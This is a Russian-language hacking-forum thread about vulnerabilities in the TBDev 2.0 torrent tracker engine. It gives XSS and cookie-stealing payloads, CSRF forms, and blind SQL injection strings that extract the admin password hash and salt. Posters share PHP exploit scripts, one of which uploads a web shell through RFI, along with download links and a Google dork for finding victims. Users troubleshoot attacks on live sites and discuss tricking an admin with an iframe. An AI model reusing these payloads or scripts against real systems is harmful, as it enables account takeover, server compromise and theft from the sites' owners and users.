![]() |
Трекер-движок TBDev 2.0
Баги искал на, TBDev 2.0 Yuna Scatari Edition, подозреваю что в других редакциях они так-же работают:
Раскрытие пути, если не залогинен: Код:
confirm.php?id[]=Код:
thanks.phpКод:
http://site/offcomment.php?action=<script>alert(/XSS/)</script>Код:
<form action="http://site/getrss.php" method="POST">Код:
<form action="http://site/comment.php?action=edit&cid=ID_комментария" method="POST">Ищется в гугле, как: "Powered by TBDev v2.0" В общем, всё что нашёл сегодня, багов на порядок больше, но искал не оч. глубоко. |
HTTP Splitting (простого пользователя достаточно):
Код:
<form action="http://site/message.php?action=takemessage" method="POST">Код:
<form action="http://site/message.php?action=mass_pm" method="POST">Код:
Referer: ><script>alert(/Hi/)</script>Код:
<form action="http://site/nowarn.php" method="POST">Blind SQL Inj(требуются права модератора) Код:
<form action="http://site/nowarn.php" method="POST"> |
SQL Inj
Код:
http://site/requests.php?action=reset&requestid=sql'SQL Inj Код:
http://site/requests.php?action=reset&requestid=sql'SQL Inj: POST: Код:
http://site/requests.phpBlind SQL Inj: POST: Код:
http://site/offers.phpSQL Inj (требуются права модератора): POST: Код:
http://site/offers.phpXSS Код:
http://site/viewrequests.php?category=><script>alert(/XSS/)</script>Код:
http://site/staffmess.php?returnto=><script>alert(/XSS/)</script>Код:
http://site/offcomment.php?action=edit&cid=3Код:
http://site/offcomment.php?action=vieworiginal&cid=3Код:
http://site/offcomment.php?action=delete&cid=1&sure=1&returnto=<script>alert(document.cookie)</script>Код:
http://site/offcomment.php?action=edit&cid=3Сори за неупорядоченность, постил по мере нахождения. Кстати, теперь по Powered by TBDev на второй строчке гугла находится античат :D |
TBDev v2.0 Blind SQL Injection Exploit
Код:
http://site/requests.php?action=reset&requestid=sql'Код:
/requests.php?action=reset&requestid=-1+or+id=if(ascii(substring((select+passhash+from+users+where+id=1),1,1))=[CHARCODE],'1',(select+1+union+select+2))+--+Результат работы - hash, salt. hash закодирован как: md5($salt.$pass.$salt); Запускать так: Код:
tbdev2sql.php url target_id login passwordСобственно код: Код:
<? |
/requests.php?action=reset&requestid=-1+or+id=if(ascii(substring((select+passhash+from+u sers+where+id=1),1,1))=[CHARCODE],'1',(select+1+union+select+2))+--+
SQL ругается.. но иньекция не проходит. в чаркод что писать?.. кодировку базы? о_0 tbdev2sql.php url target_id login password За скрипт спасибо, залил на хост юзаю.. Цитата:
|
Цитата:
Для passhash это числа от 48 до 57 включительно (0-9) и от 97 до 102 включительно (a-f). Позиция проверяемого символа задаётся в этом кусочке запроса: Код:
(select+passhash+from+u sers+where+id=1),[POS],1)Если хочешь получить соль, то вместо "passhash" подставь "secret" и диапазоны pos - 1-20, charcode - 49-57,65-90,97-122 (включительно). Соль - 20 символов [1-9,a-Z] Цитата:
P.S. А вообще посмотри сплоит, код очень прост для понимания. |
Ещё одно раскрытие пути обнаружил:
details.php?id[]= |
Ещё XSS, требуются права модератора:
Код:
http://site/stats.php?uporder="><script>alert(/XSS/)</script> |
Qwazar, а как подставить куки в эксплоит.. я юзаю его на VDS. У себя дома с поддержкой CLI запустить не вышло.. зато на VDS по ssh пошло, как по маслу.. как подменить куки? +++
|
Цитата:
Но если очень хочется, можешь эту строку Код:
$cookie = getcookie($url, $name, $password);Код:
$cookie = "А СЮДА ВСЁ ЧТО ХОЧЕШЬ" |
Запустил..
Код:
Trying to get your cookies... [DONE] |
Цитата:
1) Переписать сплоит так, чтобы использовался бинарный поиск (так уменьшится количество запросов) 2) Удалить всё между Код:
echo "Trying to get passhash: ";Код:
echo "Trying to get salt: "; |
Qwazar, я удалял цикл получения хеша.. толку мало, все равно lz и дальше не идет..( z - не успел перебрать.. только один символ значит. ) Пробовал менять значение $i= на 2-ю букву.. 3-ю... и т.д. в обоих случаях получаю :
Цитата:
Код:
1) Переписать сплоит так, чтобы использовался бинарный поиск (так уменьшится количество запросов) |
Хмм.. Возможно у тебя чуть другая версия TBDev, тогда может у тебя соль не [1-9,a-Z], а [0-9,a-Z]. Попробуй в том цикле, где ищется соль, поменять
Код:
for($j=49;$j<=57;$j++){Код:
for($j=48;$j<=57;$j++){ |
Цитата:
Цитата:
Цитата:
все-таки с солью что-то не то.. как я поменял алгоритм ( с нуля поиск ) то теперь в соли первые нули.. а тогда, когда эксплоитил без изменений - соль была слегка другой ( первый символ ) |
Замени кусок с солью, на:
Код:
echo "Trying to get salt: ";Цитата:
|
Прошу прощения за то что долго не отвечал :)
Новая версия сплоента, использует бинарный поиск (что делает его предпочтительнее прошлого варианта ввиду логарифмической сложности поиска, а значит и меньшем количестве запросов к серверу, во время атаки), так-же перед атакой проверяет уязвима ли цель. Поиск по соли идёт теперь в диапазоне от 0 до 255, т.к. есть данные, что соль в разных версиях (или с какими нибудь модами) генерится по разному. Код:
<?Как защититься, читаем тут: https://forum.antichat.ru/thread30641.html Не забыть и про остальные файлы кроме requests.php, двиг дырявый, я вполне мог чтото и просмотреть. З.Ы. Да и вообще хозяйке на заметку - бинарный поиск вечно рулит, незачем писать перебор в лоб и слать по 16 запросов, на каждый символ, особенно критично если сплоент на бенчмарке. |
Цитата:
вставь пас хеш в куки и будет тебе счастье :) |
Цитата:
Как я уже писал: Результат работы - hash, salt. hash закодирован как: md5($salt.$pass.$salt); Соль - 20 символов. |
Цитата:
Что первое mybbuser=3306_iIXAPC6fB3d7CqTrVbEg5kpw7Lt3aMCIv2JG 8HLAep9GAtyWu6 Объясни что сюда нужно править т.к. я в pass - правил добытый експлоитом хэш а в uid поставил 1 (типо админа) Но что в первом я непонял :( |
У меня:
Цитата:
|
Спасибо все получилось.
Еще вопрос. Реально с админки шел залить? |
как вариант ... конечно ... заифреймить админу такую HTML -ку
Код HTML:
<body onload="p.submit()"> |
C:\php>php.exe sql.php http://adrez/ 1 123123123 123123
http://adrez/:123123123:123123 Trying to get your cookies... [DONE] Trying to get passhash: Exploit failed Пробывал сайтах на 5 везде одно и тоже .. Кто может помоч? |
Цитата:
измени target_id с 1 на 3 или 4 или 10 ... вопщем посмотри id админа сначало и ставь его туда ... Т.к при установке этого движка в базу прописываеца не 1 ... у меня на локалхосте он равнялся 3 |
сделал видео _http://letitbit.net/download/262433962218/qwazar-sploit.rar.html
_http://rapidshare.com/files/165895736/qwazar_sploit.rar.html Чтобы небыло вопросов, php из видео скачан отсюда _http://php.ru/download/php-5.2.1-Win32.zip |
активные XSS в полях Email, Имя в AIM, Ваш MSN, Имя в Yahoo!, Имя в mIRC!, Сайт.
Все работает если вводить при реге, если редактировать после реги, работать не будет. В поле Email скуля, тоесть при реге вводим мыло вида ' group by 100/*@blablabla.ru выдает что количество колонок не верное. Пример получения хеша админа: в поле имейл пишем :' union select passhash from users where id=1 into outfile '../../../usr/local/www/torrent/torrents/images/1.txt'/* -- @ukrnet.ua по адрессу h**p://сайт/torrents/images/1.txt смотрим хеш юзера с id=1 пассивная хss www.site.ru/redir.php?url='><script>alert(/xak/)</script> |
TBDev2 Blind SQL Injection+RFI Exploit
Сплоит для TBDev 2.0. , от паблик версии отличается тем, что пытается залить шелл на сервер, помимо поиска пасса/соли. Если шелл залить не удаётся, значит вместо RFI прийдётся использовать LFI, или на сервере не работает функция file_put_contents, которую вполне можно заменить на обычный fopen/fwrite.
LFI/RFI в админке используя параметр admincp.php?rootpath=. Если register_globals ON, то LFI/RFI доступны и не из админки, а из index.php, тот же параметр. Читайте комментарии к сплоиту, для заливки шелла, нужно положить код Код:
<?phpТак же сплоит может просто вытащить хеш, соль не закачивая шелл. Используется алгоритм бинарного поиска, так что запросов шлётся относительно немного, для слепой скули. (максимум 4 запроса на символ, вместо стабильно 16 при полном переборе, т.е. работает минимум в 4 раза быстрее, чем при полном переборе. И вообще для всех сплоитов со слепыми скулями, использующих BENCHMARK или перебор имён таблиц, стоит использовать алгоритм бинарного поиска, так быстрее) P.S. В каталоге 'admin' вообще лежит файлик (core.php) следующего содержания: Код:
$op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];Dork:"Powered by TBDev v2.0" Качать тут: http://www.x2b.ru/get/14887 |
&
Can't create/write to file '..\..\..\usr\local\www\torrent\torrents\images\1. txt' (Errcode: 2)
|
Запрос в поле майл делаю правильно новсе время вылетает ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* -- @uspp.ru'' at line 1 хотя на локальной машине все робит на ура вчем проблема может быть ? |
Цитата:
Если прав не хватает то Errcode 13 ;) special for roa :p |
Помогите с проблемой
Цитата:
|
Цитата:
|
http://depositfiles.com/files/w2ggoxnsd
|
Витян эх, данное чудо уже не работает ((( больше никаких уязвимостей не знаешь (приват) :) ?
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
http://www.google.ru/search?hl=ru&q=Powered+by+Sky-Tracker&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2 +Google&lr= |
подскажите, зайдя на сайт как админ или сисоп я могу изменить файлы движковые или записать новые? хотябы в принципе это возможно или нет?
Sky-Tracker |
| Время: 01:32 |